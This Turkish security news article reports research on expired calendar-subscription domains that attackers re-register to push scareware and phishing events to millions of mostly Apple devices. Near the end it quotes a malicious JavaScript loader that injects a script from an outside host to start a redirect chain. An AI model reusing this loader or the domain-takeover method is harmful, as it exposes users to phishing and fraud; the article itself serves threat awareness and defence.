Dijital takvimler, kişisel ve profesyonel programları yönetmek için vazgeçilmez araçlar haline geldi. Kullanıcılar gündemlerini güncel tutmak için sıklıkla resmi tatiller, spor programları veya topluluk etkinlikleri için harici takvimlere abone olurlar.
Bu abonelikler kolaylık sunarken, kullanıcının cihazı ile harici bir sunucu arasında kalıcı bir bağlantı oluşturur.
Takvimi barındıran alan adı terk edilirse ve daha sonra süresi dolarsa, tehlikeli bir güvenlik açığının açılmasına neden olur.
Siber suçlular, süresi dolmuş bu alan adlarını yeniden kaydederek orijinal aboneliğin oluşturduğu güveni etkili bir şekilde ele geçirebilir.
Saldırı vektörü özellikle sinsidir çünkü kurbanın yeni bir eylemde bulunmasını gerektirmez. Kullanıcının cihazı, artık kötü amaçlı olan etki alanına arka planda senkronizasyon istekleri gerçekleştirmeye devam eder.
Saldırganlar daha sonra sistem güvenlik uyarılarını taklit eden korku yazılımlarından özel teklifler gibi görünen kimlik avı bağlantılarına kadar çeşitli tehditleri doğrudan takvim arayüzüne gönderebilir.
Bu yöntem, geleneksel e-posta filtrelerini atlayarak, kullanıcıların kötü amaçlı yükleri iletmek için kişisel planlama araçlarına duydukları örtülü güvenden yararlanır.
Bitsight güvenlik analistleri, tatil olaylarını dağıtan tek bir şüpheli alanı araştırdıktan sonra ortaya çıkan bu tehdit ortamını belirledi.
Derin incelemeleri, aktif olarak senkronizasyon istekleri alan 390’dan fazla terkedilmiş alan adından oluşan genişleyen bir ağı ortaya çıkardı.
Daha ileri analizler, bu alanların, başta iOS ve macOS cihazlarından olmak üzere, günde yaklaşık 4 milyon benzersiz IP adresiyle iletişim kurduğunu gösterdi.
.webp)
Bu devasa ölçek, basit bir zaman aşımına uğramış alan adı kaydının milyonlarca kullanıcıyı, bilgileri olmadan nasıl potansiyel tehlikeye maruz bırakabileceğinin altını çiziyor.
Senkronizasyon Trafiğinin Teknik Dağılımı
Soruşturma, bu istismarı kolaylaştıran belirli teknik kalıpları ortaya çıkardı. Trafik, Kabul Et başlığının cihazın takvim dosyalarını ayrıştırmaya hazır olduğunu bildirdiği HTTP istekleriyle karakterize edilir.
.webp)
Tipik olarak daemon tanımlayıcısını içeren Kullanıcı Aracısı dizesi, kaynağı açıkça iOS Takvim sistemi olarak tanımlar ve isteğin kullanıcı tarafından başlatılan bir tarayıcı ziyareti yerine bir arka plan işlemi olduğunu doğrular.
GET /[URI]
Host: [Target_Domain]
User-Agent: iOS/17.5.1 (21F90) dataaccessd/1.0
Accept: text/calendarAraştırmacılar kötü amaçlı trafiği iki ana türe ayırdı: Base64 kodlu URI’ler ve Webcal sorgu istekleri.
.webp)
Yukarıdaki şekilde görüldüğü gibi, etkin etki alanı tarafından döndürülen Takvim .ics dosyası, sunucu, üzerinde oynanmış olay verileri içerebilen bir iCalendar dosyasıyla yanıt verir.
Ek olarak, temeldeki altyapı, daha derin riskleri gerçekleştirmek için sıklıkla yoğun şekilde gizlenmiş JavaScript kullanır.
Aşağıdaki kod parçacığı, bir yönlendirme zincirini başlatmak için sayfanın Belge Nesne Modeline bir verinin dinamik olarak nasıl enjekte edildiğini gösterir: –
_0x407c32.src = "https://render.linetowaystrue.com/jRQxhz";
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(_0x407c32, document.currentScript);
}Bu komut dosyası, gizliliği kaldırıldığında, daha fazla kötü amaçlı içerik yüklemek için kullanılan mekanizmayı ortaya çıkarır ve genellikle kullanıcıları dolandırıcılığa yönlendirir.
Güvenlik uzmanları, bu farklı trafik imzalarını ve komut dosyası davranışlarını anlayarak bu gizli saldırı vektörünü daha iyi tanımlayabilir ve engelleyebilir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
